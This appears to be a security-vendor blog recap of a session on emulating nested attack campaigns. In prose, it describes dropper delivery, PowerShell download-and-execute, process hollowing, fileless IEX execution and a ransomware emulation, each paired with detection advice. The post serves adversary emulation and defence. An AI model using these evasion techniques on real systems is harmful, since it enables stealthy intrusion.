In a recent Threat Thursday Live session, the team at SCYTHE delved into a recurring question from users and workshop attendees: How do you emulate nested campaigns, especially in scenarios involving droppers and second-stage payloads? Whether you're using SCYTHE or another command-and-control (C2) framework, this guide walks you through several techniques that simulate threat actors launching secondary implants or campaigns.
Nested campaigns mimic a realistic threat scenario where a primary payload (often referred to as a "dropper") launches additional payloads. This approach reflects how adversaries limit each component’s functionality for stealth and evasion. Rather than having a single implant carry out an entire attack chain, tasks are split among multiple binaries or scripts.
This method:
In the session, five core techniques were demonstrated to emulate these behaviors using Scythe’s capabilities.
Method: Using SCYTHE’s virtual file system (VFS), a prebuilt executable (drop.exe) is transferred to the target machine via an existing C2 channel.
Execution: The executable is stored in the user's Downloads folder and executed using PowerShell.
Detection Tip: Because the file is pulled directly from an established C2 channel, there is no internet activity—making it harder to detect via conventional download monitoring.
Method: Utilizing a direct download link generated in SCYTHE, the dropper binary is retrieved via a wget PowerShell command and executed.
Customization: These links can point to EXE, DLL, or client/hosted files, depending on your campaign's needs.
Method: Instead of direct download links, the binary is hosted in the public-facing VFS directory.
Benefit: Allows file staging externally and mimics use of redirectors or compromised web servers. You can further disguise your download origin or pre-process the file with obfuscation tools like Donut.
Method: The downloaded campaign (converted into shellcode) is injected into a legitimate process (e.g., calc.exe), using process hollowing.
Why It Matters: This technique helps evade detection by making malicious activity appear to originate from a benign process.
Detection Tip: Look for suspicious parent-child relationships (e.g., calc.exe unexpectedly launching PowerShell or another implant).
Method: Use the Invoke-Expression (IEX) method to run scripts like SharpHound.ps1 directly from memory, avoiding disk writes.
Hosting: Scripts are hosted in the public VFS and pulled into the PowerShell session via HTTP.
Detection Tip: While command-line arguments are still logged, the script itself isn’t written to disk, requiring memory inspection or behavioral analysis for detection.
Method: A PowerShell script hosted in the VFS executes a wget download and starts the process, all managed via UpShell (unmanaged PowerShell), further reducing visibility.
Detection Consideration: Only the dropped file is written to disk; the command execution and download activities are often invisible to script block logging and process creation logs.
The team also demonstrated a small ransomware emulation as the dropped campaign:
Detection efforts should focus on:
File Creations by PowerShell/CMD. Monitoring these can surface suspicious droppers.
Command-Line Arguments. Look for unusual use of wget, IEX, or PowerShell re-invocation.
Process Trees. Tools like Splunk’s PSTree plugin or EDR platforms help visualize suspicious process hierarchies (e.g., PowerShell → Dropper → Calc.exe → PowerShell).
Anomalous Behavior from Common Binaries. Applications like calc.exe or chrome.exe should not spawn multiple child processes.
This walkthrough highlights just a few ways to simulate nested campaigns, from overt to highly stealthy techniques. While demonstrated using Scythe, many of these approaches are applicable across other platforms like Cobalt Strike, Empire, or custom tooling.